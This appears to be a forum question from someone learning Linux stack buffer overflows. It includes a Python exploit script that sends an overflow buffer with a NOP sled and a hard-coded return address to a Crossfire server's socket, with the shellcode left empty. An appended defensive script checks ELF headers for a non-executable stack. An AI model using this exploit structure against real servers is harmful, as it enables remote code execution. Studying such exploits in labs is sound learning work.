I am practicing Linux BOF exploitation. When trying to exploit a vulnerability in crossfire, everything works well: the shellcode gets placed in the right place and the program flow is redirected to it. However, when the shellcode starts executing, the program fails.
OS version (bt5 R3):
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
import socket, sys
host = sys.argv[1]          # target host is taken from the command line
# 0x8134e77  jmp eax
# 0xb7dadad6 address of the nop sled
shellcode = ""              # the shellcode bytes were omitted from the post; insert them here
crash = "\x90" * 199 + shellcode + "\x43" * 4090 + "\xd6\xda\xda\xb7" + "D" * 7
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 13327))    # crossfire's default listening port (not stated in the post)
print "[*]Sending evil buffer..."
s.send(buffer)
s.close()
print "[*]Payload Sent !"
I placed a breakpoint before the shellcode and the execution flow hits it successfully; however, after continuing, the program crashes and gives the following message:
"Program received signal SIGSEGV, Segmentation fault.
0xb7daeb36 in ?? ()"
When inspecting this address, it's full of zeros!
I already disabled ASLR before starting the exercise, and I am wondering whether any other protection mechanism exists that prevents exploitation?
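One protection worth checking besides ASLR is whether the binary's stack is mapped executable at all. The following Python 3 script is an added example, not code from the original post: it parses a binary's ELF program headers and reports what the PT_GNU_STACK entry says about the stack (an absent entry makes the Linux loader fall back to an executable stack on i386). The ELF image it is tested against is constructed inline; pass real paths on the command line to audit installed binaries.

```python
import struct, sys

PT_GNU_STACK = 0x6474E551  # program header type that records the requested stack permissions
PF_X = 0x1                 # executable bit in p_flags

def gnu_stack_flags(elf):
    """Return p_flags of the PT_GNU_STACK header, or None if the binary has no such header."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = elf[4], elf[5]
    end = "<" if ei_data == 1 else ">"          # EI_DATA: 1 = little endian, 2 = big endian
    if ei_class == 1:                            # ELF32 header layout
        e_phoff, = struct.unpack_from(end + "I", elf, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 42)
        fmt, flags_idx = end + "IIIIIIII", 6     # p_type ... p_flags is the 7th field
    else:                                        # ELF64 header layout
        e_phoff, = struct.unpack_from(end + "Q", elf, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 54)
        fmt, flags_idx = end + "IIQQQQQQ", 1     # p_type, p_flags come first in Elf64_Phdr
    for i in range(e_phnum):
        ph = struct.unpack_from(fmt, elf, e_phoff + i * e_phentsize)
        if ph[0] == PT_GNU_STACK:
            return ph[flags_idx]
    return None

def stack_is_executable(elf):
    """True if the stack will be mapped executable; a missing header defaults to executable on i386."""
    flags = gnu_stack_flags(elf)
    return True if flags is None else bool(flags & PF_X)

def build_elf32(p_type, p_flags):
    """Constructed minimal ELF32 little-endian image with a single program header (test fixture)."""
    ehdr = b"\x7fELF\x01\x01\x01" + b"\x00" * 9  # e_ident: ELF32, LSB, version 1
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    ehdr += struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0, 52, 32, 1, 40, 0, 0)
    phdr = struct.pack("<IIIIIIII", p_type, 0, 0, 0, 0, 0, p_flags, 16)
    return ehdr + phdr

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            exe = stack_is_executable(f.read())
        print("%s: stack %s" % (path, "EXECUTABLE (no NX)" if exe else "non-executable (NX)"))
```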